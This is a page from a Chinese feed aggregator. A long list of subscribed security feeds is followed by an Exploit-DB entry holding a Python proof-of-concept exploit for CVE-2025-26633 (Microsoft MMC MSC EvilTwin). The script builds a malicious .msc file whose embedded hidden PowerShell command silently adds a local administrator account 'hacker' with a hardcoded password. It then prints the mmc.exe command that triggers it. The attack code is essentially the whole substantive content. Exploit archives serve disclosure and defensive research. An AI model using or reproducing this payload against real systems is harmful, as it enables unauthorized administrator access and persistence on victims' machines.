惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

V2EX - 技术
V2EX - 技术
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
T
Threat Research - Cisco Blogs
T
The Exploit Database - CXSecurity.com
S
Schneier on Security
S
Securelist
P
Privacy & Cybersecurity Law Blog
Scott Helme
Scott Helme
T
Threatpost
C
Cybersecurity and Infrastructure Security Agency CISA
L
LINUX DO - 热门话题
Cyberwarzone
Cyberwarzone
Cisco Talos Blog
Cisco Talos Blog
量子位
博客园 - Franky
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Latest news
Latest news
T
Troy Hunt's Blog
N
News | PayPal Newsroom
Google Online Security Blog
Google Online Security Blog
Apple Machine Learning Research
Apple Machine Learning Research
N
Netflix TechBlog - Medium
小众软件
小众软件
P
Palo Alto Networks Blog
Spread Privacy
Spread Privacy
C
Cyber Attacks, Cyber Crime and Cyber Security
C
Check Point Blog
aimingoo的专栏
aimingoo的专栏
WordPress大学
WordPress大学
L
Lohrmann on Cybersecurity
L
LINUX DO - 最新话题
D
Darknet – Hacking Tools, Hacker News & Cyber Security
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
The Last Watchdog
The Last Watchdog
S
Security @ Cisco Blogs
P
Privacy International News Feed
Last Week in AI
Last Week in AI
Microsoft Security Blog
Microsoft Security Blog
T
Tailwind CSS Blog
博客园_首页
云风的 BLOG
云风的 BLOG
V
Vulnerabilities – Threatpost
D
DataBreaches.Net
Recent Announcements
Recent Announcements
酷 壳 – CoolShell
酷 壳 – CoolShell
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
罗磊的独立博客
Engineering at Meta
Engineering at Meta
Forbes - Security
Forbes - Security
T
Tenable Blog

Exploit-DB.com RSS Feed

MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive
OffSec’s Exploit Database Archive
Mohammed Idrees Banyamer · 2026-04-08 · via Exploit-DB.com RSS Feed
#!/usr/bin/env python3
# Exploit Title: Microsoft MMC MSC EvilTwin - Local Admin Creation 
# Date: 2025-11-22
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.microsoft.com
# Software Link: N/A (built-in Windows component - mmc.exe)
# Version: Windows 10 all editions, Windows 11 all editions, Windows Server 2016-2025
# Tested on: Windows 11 24H2 (unpatched), Windows 10 22H2 (unpatched)
# CVE: CVE-2025-26633
# CVSS: 7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
# Category: Local
# Platform: Windows
# CRITICAL: This is a post-exploitation / living-off-the-land technique widely used in real attacks
# Including: Zero-day at time of disclosure (March 2025), actively exploited by Water Gamayun APT
# Impact: Arbitrary code execution with the privileges of the user opening the .msc file
# Fix: Apply Microsoft Patch Tuesday March 2025 updates (e.g., KB5053602 and later)
# Advisory: https://www.zerodayinitiative.com/advisories/ZDI-25-25-150/
# Patch: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-26633
# Target: Unpatched Windows systems (pre March 2025 patches)

# CVE-2025-26633 Proof of Concept – Add Local Administrator Account
# Use ONLY in authorized penetration testing or isolated research labs

import os
import xml.etree.ElementTree as ET

# PAYLOAD: Adds local administrator account "hacker" silently
PAYLOAD = (
    'powershell.exe -NoP -W Hidden -C "'
    '$user = \\\'hacker\\\'; '
    '$pass = ConvertTo-SecureString \\\'P@ssw0rd123!\\\' -AsPlainText -Force; '
    'New-LocalUser -Name $user -Password $pass -FullName \\\'Lab User\\\' '
    '-Description \\\'Research account\\\' -ErrorAction SilentlyContinue; '
    'Add-LocalGroupMember -Group \\\'Administrators\\\' -Member $user '
    '-ErrorAction SilentlyContinue; '
    'Write-Host \\\'[+] User hacker:P@ssw0rd123! added to Administrators\\\'"'
)

def create_evil_msc(filename="CVE-2025-26633-AddAdmin.msc"):
    root = ET.Element("MMC_ConsoleFile", ConsoleVersion="3.0")
    
    string_table = ET.SubElement(root, "StringTable")
    ET.SubElement(string_table, "String", id="1").text = "Local Users and Groups"
    ET.SubElement(string_table, "String", id="2").text = "Security Research Snap-in"
    
    snapins = ET.SubElement(root, "SnapIns")
    snapin = ET.SubElement(snapins, "SnapIn")
    
    ET.SubElement(snapin, "Name").text = "{7B8B9A1C-2D3E-4F5A-9B6C-1A2B3C4D5E6F}"
    ET.SubElement(snapin, "Description").text = "Custom Administration Tool"
    
    actions = ET.SubElement(snapin, "Actions")
    action = ET.SubElement(actions, "Action")
    ET.SubElement(action, "RunCommand").text = PAYLOAD
    ET.SubElement(action, "Name").text = "AddLocalAdmin"
    
    tree = ET.ElementTree(root)
    tree.write(filename, encoding="utf-16", xml_declaration=True)
    print(f"[+] Malicious .msc file successfully created: {filename}")

def main():
    msc_file = "CVE-2025-26633-AddAdmin.msc"
    create_evil_msc(msc_file)
    
    print("\n[+] Next step (execute inside vulnerable target or lab VM):")
    print(f"    mmc.exe \"{os.path.abspath(msc_file)}\"\n")
    print("[!] Instant local admin account will be created:")
    print("    Username : hacker")
    print("    Password : P@ssw0rd123!")
    print("    Verify with: net localgroup administrators")

if __name__ == "__main__":
    main()